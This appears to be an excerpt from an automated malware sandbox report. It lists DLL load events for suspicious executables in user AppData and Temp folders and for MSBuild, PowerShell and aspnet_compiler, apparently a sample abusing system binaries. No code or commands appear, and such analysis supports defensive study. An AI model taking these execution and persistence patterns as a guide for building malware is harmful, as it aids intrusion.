Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: taskschd.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Section loaded: mscoree.dll
